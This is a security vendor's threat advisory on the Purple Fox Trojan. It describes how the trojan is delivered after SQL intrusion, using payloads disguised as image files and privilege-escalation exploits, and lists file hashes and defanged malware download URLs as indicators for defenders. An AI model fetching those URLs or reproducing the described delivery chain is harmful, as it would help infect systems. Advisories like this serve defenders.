Rewterz Threat Advisory – CVE-2019-18245 – ICS: Reliable Controls LicenseManager
December 4, 2019Rewterz Threat Alert – Spear-Phishing Campaigns Deliver the BalkanRAT
December 4, 2019Rewterz Threat Advisory – CVE-2019-18245 – ICS: Reliable Controls LicenseManager
December 4, 2019Rewterz Threat Alert – Spear-Phishing Campaigns Deliver the BalkanRAT
December 4, 2019Severity
High
Analysis Summary
Purple Fox Trojan is being pushed to victims after invasion via SQL. The attackers then download and execute multiple virus files including the Purple Fox Trojan MSI installation package, privilege escalation vulnerability, powershell script Trojan, etc. The function of the executed script is mainly to download and execute, download and execute multiple jpg, png, and picture format files. These files are disguised with picture formats. In fact, they are powershell script viruses, MSI purple fox Trojan installation files, EXE elevation of privilege vulnerabilities, etc. These will download and execute multiple privilege escalation vulnerabilities, including CVE-2018-8120, CVE-2015-1701 , ms16-032, etc., to elevate privileges, thereby enhancing the execution permissions of the current process, in order to facilitate the successful installation of the virus’s MSI installation file.
ms16-032 download address:
hxxp: //es.ldbdhm.xyz/sqlexec/1603232.jpg
CVE-2018-8120 module download address :
hxxp: //es.ldbdhm.xyz/sqlexec/1808164.jpg
hxxp: //es.ldbdhm.xyz/sqlexec/1808132.jpg
The downloaded SMB1.jpg, SMB3.jpg, and Sps.jpg files are actually MSI installation packages. The download address is hxxp: //Es.ldbdhm.xyz/sqlexec/xxx.jpg
Impact
- Code Execution
- Privilege Escalation
- Unauthorized Access
Indicators of Compromise
MD5
- 364ac68062168fc334f478a2997c6298
- 4facb81f57e515a508040270849bcd35
- 3fe38271b009298b4cb0b01ef57edbf3
- de5de649e0821b0dd3dadfa8235416ea
- be0384e85412a2668008f76dc3b3ccea
- f5df39c5ed4eb90c169216ace51ed833
- 5bab2f1dd53b3ae08dab8a1a2d7c145c
- 4658ddc4e03f0003f590666ab73261e3
- 2c62e2fbef311731ebbc26c785d10f2b
- 14018f47163809b0166591f87d1bb046
- 6467874d952a5ffc1edfd7f05b1cc86d
- beac6592dbd3a479a64789e43ec20f27
- b43442df320d1f89defd772991b6335c
- ae3e7304122469f2de3ecbd920a768d1
SHA-256
- 51a81cc0bbf67360833332d7e13aaa8b2cca6e8a18d117803cc7094bbb0336ed
- 07191e65af30541f71e876b6037079a070a34c435641897dc788c15e5f62f53c
- b2cb65c9ac36f1e3fb31dfd5235c29b396be0968e6b225d625dc3c8fd72395f4
- 762551af11f78b73441b33bd7d70890d9f835cf878dd7088463b7b07bc007aa5
- 0a6c1b99447a8ef47f8aabc57c3254b1ba128ab1dc3024453062b21ac22cc45a
- 4bf8d57ffdbfd400048b874ed0b42a8ca7f8257b7d244b7c856b6c9bf680486f
- 78375c2ea7c8fb7fb40d41f750eab63271348a11559ddb71410b16e66326d373
- 5e45545b7dd0af0ef81bee46477d41c80b6c866a4435e67306bb3c0f4f600651
- 48866c413efcfa1c5f7ab15054a16415884101e9eca2873d9a1f138440a66cfb
- 5a6f76daca16b2d8f737e8e51a2290d89aae5d412b6b0328f14b3094401e72f2
- ca7bd2830405ed53fd7f56738d7644ff8ecfd5bc63d079d322c99601c6106843
- f0b0e0548b218fb81940a4daf85c3709b2159bb357cab2f55576af3d75d47094
- 61113a0acd6469ce0d860db55c2afa3cdcbac2f5411fe8259cca43c10c042239
- 33a584a0d4907b063af867fd33cc39362b74e96e72d2ad97db7748131364eab1
URL
- hxxp://es.ldbdhm[.]xyz/SMB3.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1808164.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1808132.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/pe.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/sps.jpg
- http[:]//es.ldbdhm[.]xyz/smb3p.jpg
- http[:]//es.ldbdhm[.]xyz/SMB1.jpg
- http[:]//es.ldbdhm[.]xyz/SMB2.jpg
- http[:]//es.ldbdhm.xyz/SMB2P[.]jpg
- http[:]//es.ldbdhm[.]xyz/smb1p.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1505164.jpg
- http[:]//es.ldbdhm.xyz/sqlexec/1603232[.]jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1505132.jpg
- http[:]//es.ldbdhm[.]xyz/sqlexec/1603264.jpg
Remediation
- Block the threat indicators at their respective controls
- Maintain patches against CVE-2018-8120, CVE-2015-1701 , ms16-032.